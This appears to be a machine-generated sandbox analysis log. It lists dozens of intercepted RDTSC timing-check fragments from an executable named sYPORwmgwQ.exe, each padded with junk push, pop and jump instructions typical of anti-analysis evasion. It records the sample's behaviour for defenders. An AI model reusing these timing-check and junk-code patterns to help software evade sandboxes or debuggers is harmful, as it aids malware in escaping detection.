Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10CC352 second address: 10CC358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10CC358 second address: 10CC35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10CC60F second address: 10CC62A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F1DECBA0FE1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10CC62A second address: 10CC630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10CF57E second address: 10CF583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D25FD second address: 10D2603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D2603 second address: 10D2623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FDAh 0x00000007 jmp 00007F1DECBA0FE2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D2623 second address: 10D262A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D1E1B second address: 10D1E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1DECBA0FEFh 0x0000000a jmp 00007F1DECBA0FE9h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D1E41 second address: 10D1E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007F1DED527546h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jnl 00007F1DED527546h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b jng 00007F1DED527546h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D1E64 second address: 10D1E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F1DECBA0FE4h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D1E7D second address: 10D1E8F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1DED52754Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D1E8F second address: 10D1E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D1E93 second address: 10D1E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D2185 second address: 10D2189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D2189 second address: 10D218D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D4825 second address: 10D483C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F1DECBA0FE0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D483C second address: 10D4842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D4842 second address: 10D4846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D4846 second address: 10D4862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1DED52754Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F1DED52754Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 103FCEF second address: 103FD00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ebx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jg 00007F1DECBA0FD6h 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 103FD00 second address: 103FD47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1DED52754Fh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F1DED527554h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1DED527556h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 103FD47 second address: 103FD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 103FD4B second address: 103FD62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527553h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 103FD62 second address: 103FD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D873A second address: 10D8752 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1DED52754Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F1DED527546h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D8752 second address: 10D8756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D8756 second address: 10D8783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F1DED52756Dh 0x00000010 jmp 00007F1DED527557h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 104349C second address: 10434A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10434A2 second address: 10434AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10434AB second address: 10434B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10434B1 second address: 10434B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D8B78 second address: 10D8B8F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1DECBA0FDDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D8FE2 second address: 10D8FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D8FEC second address: 10D901E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1DECBA0FE6h 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F1DECBA0FD6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007F1DECBA0FDCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D901E second address: 10D9022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D9022 second address: 10D902E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F1DECBA0FD6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D99F0 second address: 10D99FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1DED527546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10D99FA second address: 10D9A06 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10DD96F second address: 10DD973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10DD973 second address: 10DD979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10DD979 second address: 10DD97F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10DD97F second address: 10DD983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10DD096 second address: 10DD09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10DD09F second address: 10DD0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10DD0A5 second address: 10DD0D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527558h 0x00000007 jmp 00007F1DED527550h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10DD25C second address: 10DD265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10DD572 second address: 10DD576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10DD576 second address: 10DD584 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1DECBA0FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10DD584 second address: 10DD589 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E09BD second address: 10E09C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E09C1 second address: 10E09C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E09C7 second address: 10E09F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F1DECBA0FDAh 0x00000008 jmp 00007F1DECBA0FE5h 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F1DECBA0FDEh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E09F6 second address: 10E0A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1DED527556h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E0A14 second address: 10E0A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E0A18 second address: 10E0A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E0CFE second address: 10E0D02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E0D02 second address: 10E0D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E7491 second address: 10E74B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F1DECBA0FE5h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E74B0 second address: 10E74B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E77AF second address: 10E77B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E7D68 second address: 10E7D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E7D6D second address: 10E7DBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1DECBA0FE7h 0x00000008 jmp 00007F1DECBA0FE0h 0x0000000d jnp 00007F1DECBA0FD6h 0x00000013 jno 00007F1DECBA0FD6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jg 00007F1DECBA0FD6h 0x00000022 jmp 00007F1DECBA0FE1h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E7DBD second address: 10E7DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E875A second address: 10E875E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E875E second address: 10E877D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F1DED527556h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E877D second address: 10E87A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jno 00007F1DECBA0FD8h 0x0000000d pushad 0x0000000e jmp 00007F1DECBA0FE5h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E87A8 second address: 10E87B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E87B3 second address: 10E87B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E8ADF second address: 10E8AFE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1DED527546h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 jns 00007F1DED527548h 0x00000018 popad 0x00000019 push esi 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E8DE2 second address: 10E8DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10E8DE6 second address: 10E8DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10EC23F second address: 10EC249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1DECBA0FD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10EC249 second address: 10EC281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527551h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F1DED527553h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1DED52754Bh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10EC4D8 second address: 10EC4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10EC4DC second address: 10EC4E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10EC4E0 second address: 10EC4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push edi 0x00000008 push edi 0x00000009 jns 00007F1DECBA0FD6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edi 0x00000012 push esi 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10EC657 second address: 10EC65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10EC7FE second address: 10EC802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10EC96A second address: 10EC981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10F77BA second address: 10F77BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10F82AB second address: 10F82B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10F82B3 second address: 10F82B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10F82B7 second address: 10F82BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10F8ABD second address: 10F8AEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f jmp 00007F1DECBA0FDDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10F8AEC second address: 10F8AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10F8AF4 second address: 10F8AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10F91FB second address: 10F9200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10F9200 second address: 10F920C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1DECBA0FD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10F6EDD second address: 10F6F05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527555h 0x00000007 jmp 00007F1DED52754Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10FB9CD second address: 10FB9D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10FB9D1 second address: 10FB9F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F1DED527557h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 10FB868 second address: 10FB874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1DECBA0FD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1100C09 second address: 1100C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F1DED527546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1100C14 second address: 1100C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1DECBA0FE3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1DECBA0FDEh 0x00000011 jmp 00007F1DECBA0FDBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1100C47 second address: 1100C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
